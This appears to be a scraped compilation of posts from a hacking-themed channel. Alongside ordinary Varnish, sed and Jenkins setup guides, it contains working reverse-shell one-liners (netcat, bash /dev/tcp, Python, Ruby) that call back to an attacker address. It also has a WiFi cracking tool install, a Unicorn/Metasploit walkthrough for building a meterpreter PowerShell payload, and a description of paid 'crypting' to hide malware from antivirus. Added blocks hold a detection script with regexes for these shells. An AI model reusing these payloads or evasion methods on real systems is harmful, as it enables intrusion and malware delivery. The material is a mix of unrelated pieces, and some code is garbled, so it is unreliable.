UNDERCODE COMMUNITY
Undercode Cyber World!
@UndercodeCommunity


New tip: Installing and Configuring Varnish, Part 1: How to Install Varnish on Debian and Ubuntu
Alexey, 10/16/2020. Tags: Web server, Hitch, Varnish Cache, caching


1. How to install Varnish on Debian and Ubuntu

1.1 How Varnish Caching Works for Apache

1.2 Correct Port Configuration for Varnish and Apache

1.3 Installing Varnish

1.4 Configuring Apache to Work with Varnish

1.5 Configuring Varnish to Work with Apache and Hitch

1.6 Checking Varnish and Apache

1.7 Configuring Hitch to Work with Varnish

1.8 Error "ERR_TOO_MANY_REDIRECTS"

1.9 How to tell if Varnish is running

1.10 How to Check Varnish Cache Speed

1.11 Renewing SSL Certificate Using Varnish and Hitch

1.12 Varnish is useless without configuration

2. How to set up Varnish, example rules

3. The Varnish Utilities

4. Varnish modules

How Varnish Caching Works for Apache
To understand the essence of web server caching, you need to remember how a website works:

1) A user requests a certain page

2) Template files and source files are read from disk

3) The necessary information is retrieved from the database

4) The information from the database is processed

5) A page is formed and sent to the user

Even most of the simplest requests start the chain of actions described above. Moreover, the number of operations performed can be even greater, or applications at the system level can be used to form the content of a web page.

And so it goes every time: for each user request, the page is rebuilt.

The essence of caching is that the page is created once and after that it is stored in the cache, which is kept in RAM. If a request comes back to show an already cached page

Benefits of using Varnish:

1) Varnish Cache boosts the speed of your content-rich website.

2) Fast loading speeds help improve user experience and retain customers.

3) Your web server can efficiently handle website traffic with improved and smooth performance.

4) In the event of a server crash, your site will still work, delivering cached content.

5) You no longer need to update your existing hosting package from time to time as it can support high traffic. This, in turn, makes your site scalable.

6) High website speed increases the likelihood that your website will be picked up by search engines and show up in search results.

7) Varnish also reduces the number of servers required.


You're not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity

Wifi hacking:

1) Start monitor mode

2) Stop monitor mode

3) Scan Networks

4) Getting Handshake

5) Create wordlist

6) Install Wireless tools

7) WPS Networks attacks

8) Scan for WPS Networks

9) Crack Handshake with rockyou.txt

10) Crack Handshake with wordlist

11) Crack Handshake without wordlist

Installation & run:

1) sudo apt-get update && sudo apt-get install git

2) sudo git clone https://github.com/ankit0183/Wifi-Hacking

3) cd Wifi-Hacking/

4) sudo python3 Wifi-Hacking.py


git 2020

IP TRACKING TOOLS:

* [AutoTTP](https://github.com/jymcheong/AutoTTP) - Automated Tactics Techniques & Procedures. Re-running complex sequences manually for regression tests, product evaluations, generate data for researchers.

* [Blue Team Training Toolkit (BT3)](https://www.bt3.no/) - Software for defensive security training, which will bring your network analysis training sessions, incident response drills and red team engagements to a new level.

* [Caldera](https://github.com/mitre/caldera) - Automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge (ATT&CK™) project.

* [DumpsterFire](https://github.com/TryCatchHCF/DumpsterFire) - Modular, menu-driven, cross-platform tool for building repeatable, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations.

* [Metta](https://github.com/uber-common/metta) - Information security preparedness tool to do adversarial simulation.

* [Network Flight Simulator](https://github.com/alphasoc/flightsim) - Lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility.


Using the sed command in the shell to delete specific lines:

Deleting lines by line number

Delete line N:

sed -i 'Nd' filename

Delete lines N through M:

sed -i 'N,Md' filename # deletes lines N through M of the file

Delete the line range given by shell variables (used with for statements):

sed -i "${var1},${var2}d" filename

Delete the last line:

sed -i '$d' filename

Deleting lines that contain specific characters

Delete every line containing "xxx":

sed -i '/xxx/d' filename
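
When the line numbers come from shell variables, as in the "${var1},${var2}d" form above, the variables become part of the sed script, so they should be checked to be plain numbers before sed sees them. The following is an added example, not part of the original post; the function names is_lineno, delete_range and demo_delete_range are hypothetical.

```sh
#!/bin/sh
# Added example: range delete with bounds taken from shell variables.
# The bounds are checked first, because "${first},${last}d" is pasted into
# the sed script and sed would run whatever text the variables hold.

# is_lineno VALUE: succeeds only for a positive decimal integer (no leading 0).
is_lineno() {
    case "$1" in
        ''|0*|*[!0-9]*) return 1 ;;
        *) return 0 ;;
    esac
}

# delete_range FILE FIRST LAST: delete lines FIRST..LAST of FILE in place.
# Returns 2 on rejected input, 1 if sed itself fails.
delete_range() {
    file=$1; first=$2; last=$3
    [ -f "$file" ] || return 2
    is_lineno "$first" || return 2
    is_lineno "$last" || return 2
    [ "$first" -le "$last" ] || return 2
    # -i.bak is accepted by both GNU and BSD sed; "--" protects file names
    # that start with a dash.
    sed -i.bak -e "${first},${last}d" -- "$file" || return 1
    rm -f -- "$file.bak"
}

# demo_delete_range: run on a constructed five-line file and print what is
# left, joined with commas.
demo_delete_range() {
    tmp=$(mktemp) || return 1
    printf '%s\n' one two three four five > "$tmp"
    delete_range "$tmp" 2 4 || return 1
    paste -s -d , "$tmp"
    rm -f -- "$tmp"
}

demo_delete_range
```
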


FREE CTF:

CTF 1: SEGV Hunt - Find a critical buffer overflow bug in glibc. Language: C - Difficulty level:
https://securitylab.github.com/ctf/segv

CTF 2: U-Boot Challenge - Follow in the footsteps of our security research team and discover 13 vulnerabilities in U-Boot. Language: C - Difficulty level:
https://securitylab.github.com/ctf/uboot

CTF 3: XSS-unsafe jQuery plugins - Find variants of jQuery plugins that expose their clients to undocumented XSS (cross-site scripting) vulnerabilities. Language: JavaScript - Difficulty level:
https://securitylab.github.com/ctf/jquery

Start tutorials:

https://help.semmle.com/QL/ql-training/intro-to-ql.html

https://help.semmle.com/QL/learn-ql/beginner/ql-tutorials.html

https://lgtm.com/help/lgtm/console/ql-cpp-basic-example

https://blog.semmle.com/python-code-analysis-ql/


Incident Response

* [Cyphon](https://www.cyphon.io/) - Cyphon eliminates the headaches of incident management by streamlining a multitude of related tasks through a single platform. It receives, processes and triages events to provide an all-encompassing solution for your analytic workflow: aggregating data, bundling and prioritizing alerts, and empowering analysts to investigate and document incidents.

* [Demisto](https://www.demisto.com/community/) - Demisto community edition (free) offers full incident lifecycle management, incident closure reports, team assignments and collaboration, and many integrations to enhance automations (like Active Directory, PagerDuty, Jira and much more...)

* [FIR](https://github.com/certsocietegenerale/FIR/) - Fast Incident Response (FIR) is a cybersecurity incident management platform designed with agility and speed in mind. It allows for easy creation, tracking, and reporting of cybersecurity incidents and is useful for CSIRTs, CERTs and SOCs alike.

* [RTIR](https://www.bestpractical.com/rtir/) - Request Tracker for Incident Response (RTIR) is the premier open source incident handling system targeted for computer security teams. We worked with over a dozen CERT and CSIRT teams around the world to help you handle the ever-increasing volume of incident reports. RTIR builds on all the features of Request Tracker


To save data in the cache, you use a description file, the manifest file, which lists the resources to be downloaded and cached

The manifest file can be divided into three parts:

1) CACHE MANIFEST - files listed under this heading will be cached after the first download

2) NETWORK - files listed under this heading require a connection to the server and will not be cached

3) FALLBACK - files listed under this heading specify the fallback page to use when a page is inaccessible (such as a 404 page)

When online, the user agent reads the manifest every time the page is visited. If the manifest has changed, it reloads all the resources in the list



WINDOWS LATEST VERSION, DIRECT FROM THE OFFICIAL MICROSOFT WEBSITE:

WIN 7 X64

https://download.microsoft.com/download/E/A/8/EA804D86-C3DF-4719-9966-6A66C9306598/7601.24214.180801-1700.win7sp1_ldr_escrow_CLIENT_HOMEPREMIUM_x64FRE_en-us.iso

WIN 10 2020 OCTOBER X64

https://software-download.microsoft.com/pr/Win10_20H2_EnglishInternational_x64.iso?t=9912e6b9-6607-4d50-920b-1365accf3367&e=1603296019&h=d32bb0ef976921bb6540b49df2562e0a

X32

https://software-download.microsoft.com/pr/Win10_20H2_EnglishInternational_x32.iso?t=9912e6b9-6607-4d50-920b-1365accf3367&e=1603296019&h=f0604e8764288406d5b11ab611710f62

ANYTHING ELSE YOU NEED FROM MICROSOFT.COM REQUEST @Undercode_Testing

Jenkins project build process on Linux (CentOS 7 as an example)


1. Install jdk

1. Download the jdk. The installation of jdk-8u261-linux-x64.tar.gz is used as the example.

2. Create the java folder

cd /usr/local && mkdir java

3. Then unpack the jdk package

tar -zxvf jdk-8u261-linux-x64.tar.gz

4. Configure environment variables

vi /etc/profile

5. Join

6. Save and exit

:wq

7. Make the configuration file take effect

source /etc/profile

8. Check the jdk version

java -version

2. Install node

1. Go to the official website and download the file that matches your system:

English website: https://nodejs.org/en/download/

node-v12.13.0-linux-x64.tar is used as the example

2. Unpack

cd /usr/local && tar -xvf node-v12.13.0-linux-x64.tar

3. Check the node version

node -v

3. Install go

1. Download

Download link: https://golang.google.cn/dl/

go1.15.2.linux-amd64.tar.gz is used as the example

2. Unpack

cd /usr/local && tar -zxvf go1.15.2.linux-amd64.tar.gz

3. Configure environment variables

vi /etc/profile

4. Join

Note: go get cannot be accessed directly in China, so you must first set up a proxy (to solve the problem that some packages of go cannot be downloaded)

1). Enable the go modules feature to open the proxy mode

export GO111MODULE=on

2). Set the GOPROXY environment variable to set the proxy address

export GOPROXY=https://goproxy.io

5. Save and exit

:wq

6. Make the configuration file take effect

source /etc/profile

7. View the go version

go version

4. Install jenkins

1. Download jenkins for linux from the official website: https://pkg.jenkins.io/redhat/

2. Create a folder in the root directory

mkdir jenkins

3. After the download is complete, put jenkins-2.174-1.1.noarch.rpm into the jenkins directory

Enter the jenkins directory and install the package with this command:

rpm -ivh jenkins-2.174-1.1.noarch.rpm

After the installation succeeds, check the directory where jenkins is installed

whereis jenkins

4. Find the jdk installation path

ps -ef|grep java


5. Modify the /etc/init.d/jenkins file and configure the jdk installation path

vi /etc/init.d/jenkins

6. Start jenkins

7. Visit http://server IP:8080/ and enter the jenkins password

8. Install Jenkins custom recommended plugins

9. Create Jenkins user

10. Configure git in the global tool configuration. Jenkins is now installed and you can log in



Reverse Shell Commands
The following are some useful commands to start listeners and reverse shells in Linux and Windows-based systems.

## Netcat Linux Reverse Shell
nc 10.10.10.10 888 -e /bin/sh
* 10.10.10.10 is the IP address of the machine you want the victim to connect to.
* 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).

## Netcat Windows Reverse Shell
nc 10.10.10.10 888 -e cmd.exe
* 10.10.10.10 is the IP address of the machine you want the victim to connect to.
* 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).

## Using Bash
bash -i & /dev/tcp/10.10.10.10/888 0 &1

## Using Python
python -c 'import socket, subprocess, os; s=socket. socket (socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(l,1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

## Using Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'
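
From the defender's side, the command shapes listed in this post can be matched in process-execution logs. The following is an added example, not part of the original post: the log format, the host and user names, and the four regular expressions are assumptions constructed for illustration, not a vendor rule set.

```sh
#!/bin/sh
# Added example: flag process command lines that match the reverse-shell
# shapes listed in the post. Log format and rules are assumptions.

# Constructed sample records: "time host user cmdline".
sample_log() {
cat <<'EOF'
2020-10-20T10:01:02 web01 www-data nc 10.10.10.10 888 -e /bin/sh
2020-10-20T10:01:09 web01 deploy nc -zv db01 5432
2020-10-20T10:02:30 win07 svc_iis nc 10.10.10.10 888 -e cmd.exe
2020-10-20T10:03:11 web01 www-data python -c import socket,os; s=socket.socket(); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0)
2020-10-20T10:03:40 web01 deploy python manage.py migrate
2020-10-20T10:04:05 web01 www-data ruby -rsocket -e f=TCPSocket.open("10.10.10.10",888).to_i
2020-10-20T10:04:50 web01 deploy ruby -e puts 1
2020-10-20T10:05:12 web01 www-data bash -i /dev/tcp/10.10.10.10/888
EOF
}

# One rule per line: "name regex" (POSIX extended regex, matched by grep -E).
rules() {
cat <<'EOF'
netcat_exec (^| |/)(nc|ncat|netcat)(\.exe)? (.* )?-e +[^ ]+
dev_tcp /dev/tcp/[A-Za-z0-9.-]+/[0-9]+
python_socket_dup2 python[0-9.]* +-c .*socket.*dup2
ruby_tcpsocket ruby .*-rsocket.*TCPSocket
EOF
}

# scan_log: records on stdin, one "rule: record" line on stdout per hit.
scan_log() {
    log=$(cat)
    rules | while read -r name regex; do
        printf '%s\n' "$log" | grep -E -- "$regex" | sed "s/^/$name: /"
    done
}

# count_hits: number of flagged records in the constructed sample.
count_hits() {
    sample_log | scan_log | wc -l | tr -d ' '
}

sample_log | scan_log
```

The three routine commands run by the deploy user (a port check, a Python script and a Ruby one-liner) are left unflagged, which is the property to keep when tuning the rules against real process logs.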



For any Debian-based OS


A) Install the Metasploit framework
Metasploit is a Unicorn dependency. Before installing Unicorn, we'll take a quick look at the Metasploit installation to make sure we have the latest version. For this we use the repository on GitHub.

Kali does a great job of keeping Metasploit stable in its repos, but we'll show you how to install the most recent version. First, uninstall any old versions of Metasploit that you may already have installed in Kali.

apt-get remove metasploit-framework
Then use cURL to download the Metasploit installer.

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
Update the permissions for the msfinstall file to make sure it will execute.

chmod 755 msfinstall
Run the installer script using the command ./msfinstall.

./msfinstall

B) Install Unicorn
Once Metasploit has been installed, you can install Unicorn by cloning the repository from GitHub using the git clone command github.com/trustedsec/unicorn.

git clone https://github.com/trustedsec/unicorn


Now change to the new Unicorn directory using the cd command.

cd unicorn/
Use ./unicorn.py --help to view the available Unicorn options and detailed descriptions of each attack.

./unicorn.py --help

Generate the payload
To create payload with Unicorn use below command.

./unicorn.py windows/meterpreter/reverse_https
Unicorn will use the reverse_https Metasploit module to connect to the hacker's IP using the specified port.

[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode

During payload generation, Unicorn will create two new files. The first will be the powershell_attack.txt file, the contents of which can be viewed with the cat powershell_attack.txt command. This command will display the PowerShell code that will run on the target Windows 10 machine and create a connection to meterpreter.

cat powershell_attack.txt



Crypt / Why? / Types / Issue price:

1) Crypt (crypting) is the process of hiding your malicious code from antiviruses (hereinafter referred to as AV).

2) This is the process of modifying the code of your file (exe / dll) in such a way that the file itself remains operational and all antiviruses will consider that the file is harmless to the system.

3) This is accomplished in a variety of ways. The simplest ones are adding garbage sections or false calls and jumps to the file code. This simplest method has long lost its relevance due to the development of antiviruses and logistic methods of file analysis (heuristic analysis).

4) Now more complex methods are used, which include a huge complex of file modifications. And the more sophisticated the methods, the longer your file will remain "clean" for AV.

There are two types of such crypts:

1) Manual - this is when your file is modified manually, individually for the task. It is believed that this method gives a better quality result and the file stays "clean" longer.

2) With the help of a cryptor - this is an automatic method in which a program is written in advance, which produces a number of modifications standard for each file. This method is considered less reliable because the procedures performed on the file are the same for all files. This, in turn, means that if one of the files is caught by the AV, then all the others will soon begin to be detected (identified by AV as malicious).

With each such modification (process), the file size is increased by a certain number of kilobytes. This size is different for each service / cryptor and can vary from 5kb to 300kb. Less is better. The extra size is called the stub. The price ranges from $5 to $50: automatic (using a cryptor) costs $5-15, manual costs $25-50.
